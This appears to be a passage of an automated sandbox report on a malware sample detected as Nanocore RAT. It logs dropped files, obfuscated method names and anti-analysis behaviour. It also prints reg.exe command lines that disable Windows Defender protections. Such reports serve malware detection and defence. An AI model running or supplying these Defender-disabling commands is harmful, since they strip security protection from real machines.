          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 2.0.Service.exe.900000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 2.2.Service.exe.900000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 2.2.Service.exe.900000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 16.0.dhcpmon.exe.c60000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
          Source: 16.2.dhcpmon.exe.c60000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

          Persistence and Installation Behavior:

          barindex
          Uses cmd line tools excessively to alter registry or file dataShow sources
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeFile created: C:\Users\user\Desktop\Service.exeJump to dropped file
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeFile created: C:\Users\user\Desktop\Main.exeJump to dropped file
          Source: C:\Users\user\Desktop\Service.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\Service.exeFile opened: C:\Users\user\Desktop\Service.exe:Zone.Identifier read attributes | delete
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Main.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Main.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Main.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Service.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Main.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Service.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Main.exeWindow / User API: threadDelayed 381
          Source: C:\Users\user\Desktop\Service.exeWindow / User API: threadDelayed 365
          Source: C:\Users\user\Desktop\Service.exeWindow / User API: threadDelayed 980
          Source: C:\Users\user\Desktop\Service.exeWindow / User API: foregroundWindowGot 1011
          Source: C:\Users\user\Desktop\Service.exeWindow / User API: foregroundWindowGot 370
          Source: C:\Users\user\Desktop\Main.exe TID: 6496Thread sleep count: 381 > 30
          Source: C:\Users\user\Desktop\Service.exe TID: 6644Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\Service.exe TID: 6640Thread sleep time: -160000s >= -30000s
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 7124Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0131A717 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0132BA20 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0133AC28 FindFirstFileExA,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0132DEAF VirtualQuery,GetSystemInfo,
          Source: C:\Users\user\Desktop\Service.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Main.exeFile opened: C:\Users\user\AppData\Local\Temp\DFA1.tmp
          Source: C:\Users\user\Desktop\Main.exeFile opened: C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp
          Source: C:\Users\user\Desktop\Main.exeFile opened: C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.tmp
          Source: C:\Users\user\Desktop\Main.exeFile opened: C:\Users\user\AppData\Local\
          Source: C:\Users\user\Desktop\Main.exeFile opened: C:\Users\user\
          Source: C:\Users\user\Desktop\Main.exeFile opened: C:\Users\user\AppData\
          Source: Service.exe, 00000002.00000002.605384365.0000000006490000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.338466953.0000018009A10000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.340883590.0000020660A30000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.343402991.0000020F76930000.00000002.00000001.sdmp, reg.exe, 0000000C.00000002.349421127.000001B6331E0000.00000002.00000001.sdmp, reg.exe, 0000000D.00000002.350811973.000001F44CBA0000.00000002.00000001.sdmp, reg.exe, 0000000E.00000002.353812253.000001D25D9A0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: Service.exe, 00000002.00000002.598779863.000000000109E000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: Service.exe, 00000002.00000002.605384365.0000000006490000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.338466953.0000018009A10000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.340883590.0000020660A30000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.343402991.0000020F76930000.00000002.00000001.sdmp, reg.exe, 0000000C.00000002.349421127.000001B6331E0000.00000002.00000001.sdmp, reg.exe, 0000000D.00000002.350811973.000001F44CBA0000.00000002.00000001.sdmp, reg.exe, 0000000E.00000002.353812253.000001D25D9A0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: Service.exe, 00000002.00000002.605384365.0000000006490000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.338466953.0000018009A10000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.340883590.0000020660A30000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.343402991.0000020F76930000.00000002.00000001.sdmp, reg.exe, 0000000C.00000002.349421127.000001B6331E0000.00000002.00000001.sdmp, reg.exe, 0000000D.00000002.350811973.000001F44CBA0000.00000002.00000001.sdmp, reg.exe, 0000000E.00000002.353812253.000001D25D9A0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Service.exe, 00000002.00000002.598779863.000000000109E000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: Service.exe, 00000002.00000002.605384365.0000000006490000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.338466953.0000018009A10000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.340883590.0000020660A30000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.343402991.0000020F76930000.00000002.00000001.sdmp, reg.exe, 0000000C.00000002.349421127.000001B6331E0000.00000002.00000001.sdmp, reg.exe, 0000000D.00000002.350811973.000001F44CBA0000.00000002.00000001.sdmp, reg.exe, 0000000E.00000002.353812253.000001D25D9A0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Service.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0132F065 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Main.exeCode function: 1_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0133767E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0133B910 GetProcessHeap,
          Source: C:\Users\user\Desktop\Service.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0132F1B3 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0132F065 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0132F38B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_013387FF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\Service.exeMemory allocated: page read and write | page guard
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\Main.exe 'C:\Users\user\Desktop\Main.exe'
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\Service.exe 'C:\Users\user\Desktop\Service.exe'
          Source: C:\Users\user\Desktop\Main.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat C:\Users\user\Desktop\Main.exe'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe query 'HKU\S-1-5-19\Environment'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableBehaviorMonitoring' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableOnAccessProtection' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection' /v 'DisableScanOnRealtimeEnable' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableAntiSpyware' /t REG_DWORD /d '1' /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe Reg.exe add 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v 'DisableRoutinelyTakingAction' /t REG_DWORD /d '1' /f
          Source: Service.exe, 00000002.00000002.598779863.000000000109E000.00000004.00000020.sdmpBinary or memory string: Program Manager
          Source: Service.exe, 00000002.00000002.599106978.0000000001830000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: Service.exe, 00000002.00000002.599106978.0000000001830000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: Service.exe, 00000002.00000002.599106978.0000000001830000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: Service.exe, 00000002.00000002.599106978.0000000001830000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: Service.exe, 00000002.00000002.598779863.000000000109E000.00000004.00000020.sdmpBinary or memory string: Program Manager`
          Source: Service.exe, 00000002.00000002.601487158.0000000003210000.00000004.00000001.sdmpBinary or memory string: Program ManagerXt
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_013200B8 cpuid
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: GetLocaleInfoW,GetNumberFormatW,
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0132D711 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,
          Source: C:\Users\user\Desktop\01d32b29_by_Libranalysis.exeCode function: 0_2_0131AE15 GetVersionExW,
          Source: C:\Users\user\Desktop\Service.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORY
